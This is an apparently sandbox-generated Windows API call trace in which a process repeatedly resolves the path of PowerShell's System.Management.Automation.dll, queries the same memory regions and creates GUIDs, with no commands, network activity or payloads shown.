	[0321.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.566] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa69f1584, Data2=0x3043, Data3=0x4162, Data4=([0]=0x9d, [1]=0xaf, [2]=0x43, [3]=0x8c, [4]=0xfb, [5]=0xc8, [6]=0x6a, [7]=0xa0))) returned 0x0
	[0321.566] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.567] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.568] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.568] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.568] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.569] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.570] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.570] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.570] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.572] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.572] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.573] VirtualQuery (in: lpAddress=0x1cb350, lpBuffer=0x1cc210, dwLength=0x30 | out: lpBuffer=0x1cc210*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.573] VirtualQuery (in: lpAddress=0x1cb3e0, lpBuffer=0x1cc2a0, dwLength=0x30 | out: lpBuffer=0x1cc2a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.574] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.574] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.574] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.575] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.575] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.575] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.575] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.575] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc1daf9ee, Data2=0x8df8, Data3=0x47d3, Data4=([0]=0x8f, [1]=0xf6, [2]=0xe0, [3]=0x1e, [4]=0xea, [5]=0x17, [6]=0x33, [7]=0xba))) returned 0x0
	[0321.575] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.576] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.576] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.576] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.576] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.576] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.577] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.577] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.577] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.577] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.577] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.578] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.578] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.578] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.578] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.578] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.579] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.579] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.579] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
